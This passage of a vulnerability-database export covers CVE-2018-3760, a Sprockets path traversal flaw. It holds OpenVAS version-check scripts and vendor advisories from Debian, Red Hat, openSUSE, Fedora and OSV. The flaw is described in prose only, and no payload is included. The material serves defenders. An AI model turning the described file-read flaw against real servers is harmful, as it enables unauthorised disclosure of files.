value:\"VendorFix\");\n\n script_name(\"Discourse < 2.2.0.beta2 Information Leak Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_discourse_detect.nasl\");\n script_mandatory_keys(\"discourse/detected\");\n\n script_tag(name:\"summary\", 
value:\"Discourse is prone to a information leak vulnerability in the\n 'sprockets' 3rdparty component.\");\n\n script_tag(name:\"affected\", value:\"Discourse before version 2.2.0.beta2.\");\n\n script_tag(name:\"solution\", value:\"Update to version 2.2.0.beta2.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://meta.discourse.org/t/discourse-2-1-0-beta-2-release-notes/90712\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE))\n exit(0);\n\nvers = infos[\"version\"];\n\nif (version_is_less(version: vers, test_version: \"2.2.0\") ||\n version_is_equal(version: vers, test_version: \"2.2.0.beta1\")) {\n report = report_fixed_ver(installed_version: vers, fixed_version: \"2.2.0.beta2\", install_path: infos[\"location\"]);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-04T16:41:56", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-06-30T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for rubygem-sprockets (openSUSE-SU-2018:1854-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2020-06-03T00:00:00", "id": "OPENVAS:1361412562310851804", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851804", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# 
as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851804\");\n script_version(\"2020-06-03T08:38:58+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-03 08:38:58 +0000 (Wed, 03 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-06-30 05:51:01 +0200 (Sat, 30 Jun 2018)\");\n script_cve_id(\"CVE-2018-3760\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for rubygem-sprockets (openSUSE-SU-2018:1854-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-sprockets'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n script_tag(name:\"insight\", value:\"This update for rubygem-sprockets fixes the following issues:\n\n The following security vulnerability was addressed:\n\n - CVE-2018-3760: Fixed a directory traversal issue in\n sprockets/server.rb:forbidden_request?(), which allowed remote attackers\n to read arbitrary files via specially crafted requests. 
(boo#1098369)\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2018-686=1\");\n\n script_tag(name:\"affected\", value:\"rubygem-sprockets on openSUSE Leap 42.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:1854-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-06/msg00052.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-rubygem-sprockets\", rpm:\"ruby2.1-rubygem-sprockets~3.3.5~5.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-rubygem-sprockets-doc\", rpm:\"ruby2.1-rubygem-sprockets-doc~3.3.5~5.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-rubygem-sprockets\", rpm:\"ruby2.2-rubygem-sprockets~3.3.5~5.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-rubygem-sprockets-doc\", rpm:\"ruby2.2-rubygem-sprockets-doc~3.3.5~5.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.3-rubygem-sprockets\", 
rpm:\"ruby2.3-rubygem-sprockets~3.3.5~5.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.3-rubygem-sprockets-doc\", rpm:\"ruby2.3-rubygem-sprockets-doc~3.3.5~5.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.4-rubygem-sprockets\", rpm:\"ruby2.4-rubygem-sprockets~3.3.5~5.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.4-rubygem-sprockets-doc\", rpm:\"ruby2.4-rubygem-sprockets-doc~3.3.5~5.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:33:06", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-07-15T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-sprockets FEDORA-2018-fd29597fa4", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874818", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874818", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_fd29597fa4_rubygem-sprockets_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for rubygem-sprockets FEDORA-2018-fd29597fa4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without 
even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874818\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-15 06:08:09 +0200 (Sun, 15 Jul 2018)\");\n script_cve_id(\"CVE-2018-3760\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-sprockets FEDORA-2018-fd29597fa4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-sprockets'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-sprockets on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-fd29597fa4\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GMQYHKVRTMDCFD5ESASU4JA5K27JQ3NK\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-sprockets\", rpm:\"rubygem-sprockets~3.7.2~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-29T20:07:22", "description": "It was discovered that there was a path traversal flaw\nin ruby-sprockets, a Rack-based asset packaging system. A remote\nattacker could take advantage of this flaw to read arbitrary files\noutside an application", "cvss3": {}, "published": "2018-07-16T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for ruby-sprockets (DLA-1419-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891419", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891419", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891419\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2018-3760\");\n script_name(\"Debian LTS: Security Advisory for ruby-sprockets (DLA-1419-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-07-16 00:00:00 +0200 (Mon, 16 Jul 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/07/msg00010.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_tag(name:\"affected\", value:\"ruby-sprockets on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', this issue has been fixed in ruby-sprockets version\n2.12.3-1+deb8u1.\n\nWe recommend that you upgrade your ruby-sprockets packages.\");\n\n script_tag(name:\"summary\", value:\"It was discovered that there was a discovered a path traversal flaw\nin ruby-sprockets, a Rack-based asset packaging system. 
A remote\nattacker could take advantage of this flaw to read arbitrary files\noutside an application's root directory via 'file://' requests.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-sprockets\", ver:\"2.12.3-1+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "osv": [{"lastseen": "2022-05-18T05:38:26", "description": "Specially crafted requests can be used to access files that exist on the filesystem that is outside an application's root directory, when the Sprockets server is used in production.\n \nAll users running an affected release should either upgrade or use one of the work arounds immediately.\n \nWorkaround:\n \nIn Rails applications, work around this issue, set `config.assets.compile = false` and `config.public_file_server.enabled = true` in an initializer and precompile the assets.\n\nThis work around will not be possible in all hosting environments and upgrading is advised.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-06-20T22:18:58", "type": "osv", "title": "High severity vulnerability that affects sprockets", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3760"], "modified": "2022-05-18T04:15:29", "id": "OSV:GHSA-PR3H-JJHJ-573X", "href": "https://osv.dev/vulnerability/GHSA-pr3h-jjhj-573x", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "redhatcve": [{"lastseen": "2022-05-18T16:12:50", "description": "There is an information leak vulnerability in Sprockets. Versions Affected: 4.0.0.beta7 and lower, 3.7.1 and lower, 2.12.4 and lower. Specially crafted requests can be used to access files that exist on the filesystem that is outside an application's root directory, when the Sprockets server is used in production. All users running an affected release should either upgrade or use one of the work arounds immediately.\n#### Mitigation\n\nEnsure config.assets.compile = false in production.rb. 
\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-10-09T16:26:49", "type": "redhatcve", "title": "CVE-2018-3760", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3760"], "modified": "2022-05-18T15:29:36", "id": "RH:CVE-2018-3760", "href": "https://access.redhat.com/security/cve/cve-2018-3760", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "debian": [{"lastseen": "2021-10-21T18:35:01", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4242-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJuly 09, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : ruby-sprockets\nCVE ID : CVE-2018-3760\nDebian Bug : 901913\n\nOrange Tsai discovered a path traversal flaw in ruby-sprockets, a\nRack-based asset packaging system. 
A remote attacker can take advantage\nof this flaw to read arbitrary files outside an application's root\ndirectory via specially crafted requests, when the Sprockets server is\nused in production.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 3.7.0-1+deb9u1.\n\nWe recommend that you upgrade your ruby-sprockets packages.\n\nFor the detailed security status of ruby-sprockets please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/ruby-sprockets\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-09T21:06:50", "type": "debian", "title": "[SECURITY] [DSA 4242-1] ruby-sprockets security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3760"], "modified": "2018-07-09T21:06:50", "id": "DEBIAN:DSA-4242-1:A62DA", "href": "https://lists.debian.org/debian-security-announce/2018/msg00171.html", 
"cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-03T03:52:31", "description": "Package : ruby-sprockets\nVersion : 2.12.3-1+deb8u1\nCVE IDs : CVE-2018-3760 \nDebian Bug : #901913\n\nIt was discovered that there was a path traversal flaw\nin ruby-sprockets, a Rack-based asset packaging system. A remote\nattacker could take advantage of this flaw to read arbitrary files\noutside an application's root directory via \"file://\" requests.\n\nFor Debian 8 \"Jessie\", this issue has been fixed in ruby-sprockets version\n2.12.3-1+deb8u1.\n\nWe recommend that you upgrade your ruby-sprockets packages.\n\n\nRegards,\n\n- -- \n ,''`.\n : :' : Chris Lamb\n `. `'` lamby@debian.org / chris-lamb.co.uk\n `-", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-12T09:30:56", "type": "debian", "title": "[SECURITY] [DLA-1419-1] ruby-sprockets security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3760"], "modified": "2018-07-12T09:30:56", "id": "DEBIAN:DLA-1419-1:7C53E", "href": "https://lists.debian.org/debian-lts-announce/2018/07/msg00010.html", "cvss": 
{"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-02-16T23:51:08", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4242-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJuly 09, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : ruby-sprockets\nCVE ID : CVE-2018-3760\nDebian Bug : 901913\n\nOrange Tsai discovered a path traversal flaw in ruby-sprockets, a\nRack-based asset packaging system. A remote attacker can take advantage\nof this flaw to read arbitrary files outside an application's root\ndirectory via specially crafted requests, when the Sprockets server is\nused in production.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 3.7.0-1+deb9u1.\n\nWe recommend that you upgrade your ruby-sprockets packages.\n\nFor the detailed security status of ruby-sprockets please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/ruby-sprockets\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-09T21:06:50", "type": "debian", "title": "[SECURITY] [DSA 4242-1] ruby-sprockets security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3760"], "modified": "2018-07-09T21:06:50", "id": "DEBIAN:DSA-4242-1:C27C6", "href": "https://lists.debian.org/debian-security-announce/2018/msg00171.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "redhat": [{"lastseen": "2021-10-19T20:38:39", "description": "Sprockets is a Ruby library for compiling and serving web assets. It features declarative dependency management for JavaScript and CSS assets, as well as a powerful preprocessor pipeline that allows to write assets in languages like CoffeeScript, Sass and SCSS.\n\nSecurity Fix(es):\n\n* rubygem-sprockets: Path traversal in forbidden_request?() can allow remote attackers to read arbitrary files (CVE-2018-3760)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-24T07:16:12", "type": "redhat", "title": "(RHSA-2018:2245) Important: rh-ror50-rubygem-sprockets security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": 
false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3760"], "modified": "2018-07-24T07:18:39", "id": "RHSA-2018:2245", "href": "https://access.redhat.com/errata/RHSA-2018:2245", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-10-19T20:36:12", "description": "Sprockets is a Ruby library for compiling and serving web assets. It features declarative dependency management for JavaScript and CSS assets, as well as a powerful preprocessor pipeline that allows to write assets in languages like CoffeeScript, Sass and SCSS.\n\nSecurity Fix(es):\n\n* rubygem-sprockets: Path traversal in forbidden_request?() can allow remote attackers to read arbitrary files (CVE-2018-3760)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-24T07:16:08", "type": "redhat", "title": "(RHSA-2018:2244) Important: rh-ror42-rubygem-sprockets security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": 
false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3760"], "modified": "2018-07-24T07:18:37", "id": "RHSA-2018:2244", "href": "https://access.redhat.com/errata/RHSA-2018:2244", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-10-19T20:38:13", "description": "Red Hat CloudForms Management Engine delivers the insight, control, and automation needed to address the challenges of managing virtual environments. CloudForms Management Engine is built on Ruby on Rails, a model-view-controller (MVC) framework for web application development.\n\nSecurity Fix(es):\n\n* rubygem-sprockets: Path traversal in forbidden_request?() can allow remote attackers to read arbitrary files (CVE-2018-3760)\n\n* cfme: Improper access control in dRuby allows local users to execute arbitrary commands as root (CVE-2018-10905)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Stephen Gappinger (American Express) for reporting CVE-2018-10905.\n\nAdditional Changes:\n\nThis update fixes various bugs and adds enhancements. 
